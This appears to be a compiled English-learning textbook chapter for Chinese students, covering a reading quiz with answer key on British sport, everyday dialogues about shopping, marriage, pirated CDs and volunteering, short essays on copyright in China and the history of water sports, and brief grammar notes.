Sport in Britain
Time Limit __15__ Time Used_____
Read the following questions before reading and then answer them after the reading :
1. What is the second popular winter sport?
2. Why do many of the British take winter holidays on the Continent?
3. Give one reason why many of the British are interested in horse-racing.
4. What has become a national leisure activity?
The most popular winter sport, after football1 ( or ‘soccer ’ as it is colloquially called) is rugby football
( or ‘rugger ’) which remains a largely amateur game3. Winter sports such as skiing are generally
impossible in Britain ( except in Scotland) owing to4 the unsuitable climate, but more and more people
spend winter holidays on the Continent5 in order to take part in them.
One reason for the great interest in sport in Britain is the Englishman’s fondness for a little ‘flutter ’6 ( a
slang expression7 for a bet of gamble). Gambling has always been an integral part8 of such sports as
horse-racing and dog-racing and, in recent times, doing the ‘football pools’9 has become a national
pastime10. But whether as gambler, spectator or player, most Englishmen have some interest in at least
some sports.
Notes:
1. after football
2. rugby football
3. amateur game
5. the Continent
6. fondness for a little ‘flutter ’
7. a slang expression 俚语
8. an integral part
9. doing the ‘football pools’
10.pastime 消遣
Key to the questions:
1. Rugby football is the second popular winter sport.
2. Because they want to take part in winter sports such as skiing.
3. One reason for the great interest in sport in Britain is their fondness for a bet.
4. Doing the ‘football pools’ has become a national pastime.

Mom: You were dull at that time.

Dad: But you agreed to go out with me at last.

Mom: (smile) I can’t believe this for it’s been 20 years since we got married.

Recitation
Mom: Benjamin and I have been married for 20 years. He is a good husband and father though he may be a little bit dull at times. But I knew this when we were dating. He is an honest man which makes up his charm. That’s why we have been a really happy family for all these years. So we are lucky to find each other, I suppose.

May: I need some new clothes for the coming season. Where shall I go to pick up some?

Gucci: I’m thinking of buying some stuff, too. Let’s go to the speciality stores. There will be some new models for sale now.

May: Will the new models be very expensive?

Gucci: Depends on the brands. But there will be some out-of-season clothes on discount, too. So maybe we can also get some stuff, good and cheap.

May: Great. Let’s go.

(They step into a speciality store.)

Gucci: Do you like this one? I think it will be great on you.

May: I like the style. Especially the Porsche logo. Let me try it on in the fitting room. Wait a minute!

Gucci: Take your time.

(May stands in front of the mirror, wearing the new dress.)

Gucci: Hmm, not bad, but I’m afraid it’s a bit too big for you.

May: Yeah, that’s the only problem. Well, do you think they’ve got a smaller one?

Gucci: Probably not. Most of the clothes here have only one average size.

May: Never mind. What about going to check out the discount section?

Gucci: That’s what I’m thinking about.

(They come to the discount section.)

Gucci: Oh, this one.

May: What’s up?

Gucci: This dress was a new model this time last year. I loved it but it was a bit too expensive. So I gave it up.

May: Good for you. It’s 50% off now. Take it!

Gucci: Sure. I won’t miss this chance. It’s my lucky day.

The value of intellectual property has become a rising issue within China, as it seeks to further integrate itself into the world economy. The effects of producing illegal, copyrighted goods are still being studied. One effect is that artists may no longer produce top quality products if they know that many will only copy their work. This can be seen with the lawsuits against illegal downloading in the United States. These lawsuits and the threat of lawsuits by the music and movie industries are being made to keep people from breaking the law. With the level of international communication and transportation that exists today, copyright problems have become global. Yet, in the future, the relationship between industries and government will be more organized, and this may deter many copiers from breaking the rules. The effect on the industries that are being copied has also been substantial. Several industries have chosen to view this problem as a wake-up call. They are starting to rethink the emphasis placed only on profits. Many companies are beginning to offer more customer-driven prices and choices. For example, in some foreign countries, you can purchase songs on the Internet instead of buying a music CD. The prices of software and other materials are beginning to lower. China, as it joins the World Trade Organization (WTO), will no doubt begin to enact more penalties against copyright infringers as was seen in the United States. This will strengthen Chinese brands as they become more global.

May: Honey, it’s still too early to be cheerful. Test the sound quality on your CD player first.

Gucci: Sure. Oh, no!

May: What’s the matter? Anything wrong?

Gucci: It’s not Guns and Roses. Not even music!

May: Sorry. But it happens all the time. You know, it’s a pirate copy.

Gucci: Yeah. I think the vendor is still there. May I return it to get my money back?

May: Don’t even try. You can’t get that done. Just don’t buy any pirate copies any more in the future.

Gucci: Of course not. I feel cheated and it’s not so funny.

May: I understand it, honey. I had the same experience before. You know, it takes risks when you buy this illegal cheap stuff. Just forget about it and cheer up.

Gucci: You are right. Anyway, I’d like to get some CDs of Guns and Roses. Will you go with me?

May: Sure. I’d like to get some stuff for myself, too. What’s more, I’ve got a membership card here. With it, we can get a really good price.

Gucci: Really? Then let’s go and get some legal copies this time!

May: Great. Here we go.

Recitation

Roommate: Am I crazy？I just quitted the Students’ Counsel. I don’t want to be as busy as before. I’ve given up a big chance of getting scholarships for that.

May: No, joining the Olympic Volunteers’ League won’t take you much time. It only has activities on the weekends.

Roommate: Really? That’s good. I was just wondering about how to spend my free time on weekends.

May: Come on, you won’t regret about joining Olympic Volunteers’ League. It’s different from other student clubs or unions.

Roommate: What’s the difference?

May: We can do something for the upcoming Olympics in Beijing. Isn’t that special?

Roommate: Not really. I’d rather join the Entrepreneurs’ Club, so my experience will be helpful, when I look for jobs in the future.

May: That’s also a good choice. But the Entrepreneurs’ Club just hold some boring activities, you know, speeches, competitions…

Roommate: But you can learn a lot of things from the activities and it’s related to our major.

May: You can also learn a lot in Olympic Volunteers’ League. You will have the chance to learn how to communicate, how to arrange an activity and how to cooperate with your group members.

Roommate: What activities does Olympic Volunteers’ League have?

May: We will be voluntary guides, translators in Olympic Park and other nearby places.

May: You can say that again?

Roommate: OK, May, you win. Just tell me how to get enrolled for that club.

The history of man’s involvement with water sports stretches back before history was written down. It is a history of the development of technology as well as human physical achievement. Man first took to water in boats that sailed around the world with nothing but the stars to guide them. The seas and rivers were a mystery to be feared, for lurked unknown creatures and death by drowning. Few actually ventured into the water. This changed as time went on. As a sport, however, water sports such as swimming, diving, and water polo are new comparatively to those on land. Probably the oldest one is rowing in a rowboat. This is seen in modern games such as competitions between rowing clubs in British and American universities. Olympic Water Sports began with swimming but did not end there. Olympic swimming began in the same year that the modern Olympic Games began in 1896. Yet, swimming as a sport can be traced at least back to the 16th century. The different kinds of water sports such as diving or water skiing came much later. Diving is especially important for China as many Chinese divers are the best in the world. Water games for fun are also a part of everyday life. If people live around water that they can swim or play in, these will be integrated into the culture. Many cultures have a tradition of water sports. While it is still an element that is dangerous and with which we wish to measure our courage, water is no longer a thing of mystery. It has become a medium through which we can enjoy our lives.

Grammar

I wish I had listened to your advice.

She wished she hadn’t come.

2． suggest, demand, ask

He suggested that we (should ) do like that.

She demanded that I (should) pay her at once.

He asks that he (should) be given more.
